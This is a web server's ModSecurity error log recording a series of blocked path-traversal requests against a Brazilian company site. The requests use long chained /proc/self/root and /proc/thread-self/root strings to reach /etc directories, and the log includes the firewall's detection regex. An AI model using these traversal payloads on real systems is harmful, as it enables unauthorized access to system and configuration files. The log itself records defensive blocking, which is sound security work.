[Mon Mar 16 14:19:41.571724 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.241.46:45698] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7rbABkC4fWIHEf8H3jwAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:19:45.811012 2026] [:error] [pid 11972:tid 140411599251200] [client 74.7.241.46:45714] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7sZqj1wV0Si-Okef3LgAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:19:47.206220 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.241.46:45726] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7s_9ocpUE4ed4uDz4cgAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:19:52.932618 2026] [:error] [pid 11972:tid 140411590858496] [client 74.7.241.46:51814] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7uJqj1wV0Si-Okef3OQAAABI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:20:21.715037 2026] [:error] [pid 15061:tid 140411574073088] [client 74.7.241.46:51826] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg71aTCbgAP5jq5Tegz8QAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:20:29.564627 2026] [:error] [pid 14895:tid 140411683178240] [client 74.7.241.46:43520] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg73VajLEzk2WiQ-10azgAAAoc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:20:30.924512 2026] [:error] [pid 15568:tid 140411624429312] [client 74.7.241.46:40438] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg73qQpVkWug9HeOt8-JQAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:20:32.122350 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.241.46:40446] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg74LABkC4fWIHEf8H3mQAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:20:33.331798 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.241.46:40460] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg74bABkC4fWIHEf8H3mwAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:20:34.672113 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.241.46:40468] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg74rABkC4fWIHEf8H3nAAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:20:38.128619 2026] [:error] [pid 21533:tid 140411557287680] [client 74.7.241.46:40478] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg75njZBu2q05ozVU9h7gAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:20:47.349558 2026] [:error] [pid 10831:tid 140411741927168] [client 74.7.241.46:47128] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7746lpbStxTqkSkt0_wAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:20:49.698388 2026] [:error] [pid 15061:tid 140411548894976] [client 74.7.241.46:52478] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg78aTCbgAP5jq5Tegz9QAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:20:49.947696 2026] [:error] [pid 11972:tid 140411741927168] [client 74.7.243.203:35196] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg78Zqj1wV0Si-Okef3bwAAAAA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:20:52.083016 2026] [:error] [pid 10831:tid 140411658000128] [client 74.7.241.46:52490] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg79I6lpbStxTqkSkt1AgAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:20:53.412335 2026] [:error] [pid 14895:tid 140411599251200] [client 74.7.241.46:52500] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg79VajLEzk2WiQ-10a0wAAApE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:20:53.526135 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.243.203:43868] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg79f9ocpUE4ed4uDz4fAAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:20:56.823587 2026] [:error] [pid 14895:tid 140411691570944] [client 74.7.241.46:52516] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7-FajLEzk2WiQ-10a2QAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:20:57.713334 2026] [:error] [pid 15061:tid 140411725141760] [client 74.7.243.203:43882] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7-aTCbgAP5jq5Tegz-AAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:20:58.217074 2026] [:error] [pid 10651:tid 140411741927168] [client 74.7.241.46:59314] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7-rysWC90G-1nBrBNGAAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:20:59.474214 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.241.46:59324] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7-_9ocpUE4ed4uDz4fgAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
